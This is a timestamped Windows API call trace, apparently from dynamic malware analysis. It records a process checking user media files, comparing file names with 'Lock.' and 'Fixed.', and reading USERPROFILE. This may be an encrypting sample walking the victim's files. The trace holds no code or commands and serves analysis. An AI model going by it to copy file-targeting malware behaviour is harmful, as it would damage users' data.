[0214.787] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\SuK1W_b3QKmuHjRF.swf" (normalized: "c:\\users\\fd1hvy\\videos\\suk1w_b3qkmuhjrf.swf")) returned 0xffffffff [0214.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a749e8 | out: hHeap=0x2af0000) returned 1 [0214.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0214.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0214.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0214.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.788] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0214.788] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.788] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0214.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0214.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0214.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0214.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0214.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0214.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0214.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0214.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0214.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0214.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0214.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0214.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vMM vqaD0kHJ4F.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MM vqaD0kHJ4F.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M vqaD0kHJ4F.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" vqaD0kHJ4F.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vqaD0kHJ4F.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qaD0kHJ4F.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aD0kHJ4F.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D0kHJ4F.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0kHJ4F.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kHJ4F.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HJ4F.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J4F.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4F.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0214.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0214.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0214.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0214.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0214.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0214.789] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0214.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0214.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0214.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0214.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0214.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0214.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0214.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0214.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0214.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0214.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0214.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0214.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0214.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0214.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0214.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x26) returned 0x2a69a00 [0214.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0214.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vMM vqaD0kHJ4F.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MM vqaD0kHJ4F.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M vqaD0kHJ4F.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" vqaD0kHJ4F.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0214.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vqaD0kHJ4F.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qaD0kHJ4F.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aD0kHJ4F.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0214.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D0kHJ4F.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0214.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0kHJ4F.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0214.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kHJ4F.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HJ4F.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J4F.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4F.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0214.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0214.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa62c8 [0214.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0214.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa62c8 | out: hHeap=0x2af0000) returned 1 [0214.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0214.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0214.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0214.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0214.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0214.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0214.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa63e0 | out: hHeap=0x2af0000) returned 1 [0214.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0214.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0214.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0214.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0214.791] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0214.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0214.791] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0214.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0214.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0214.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0214.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721e8 [0214.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0214.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0214.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0214.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0214.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0214.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0214.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0214.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0214.792] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0214.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0214.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab020 [0214.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0214.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0214.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab110 [0214.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0214.792] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0214.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0214.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0214.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0214.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0214.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0214.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0214.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0214.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0214.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0214.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0214.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0214.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0214.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0214.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74f30 [0214.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0214.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0214.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0214.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0214.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0214.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0214.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0214.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0214.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0214.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72248 [0214.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0214.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0214.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0214.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0214.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0214.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0214.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0214.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0214.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0214.793] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0214.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0214.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab098 [0214.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0214.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0214.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0214.794] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0214.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0214.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0214.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0214.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0214.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0214.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0214.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0214.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0214.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0214.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0214.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0214.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0214.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0214.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0214.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74e60 [0214.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0214.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0214.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0214.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0214.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0214.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0214.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0214.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0214.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72348 [0214.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0214.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0214.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0214.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0214.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721d8 [0214.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0214.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0214.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab080 [0214.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0214.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0214.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0214.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0214.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0214.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0214.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0214.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0214.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0214.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0214.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 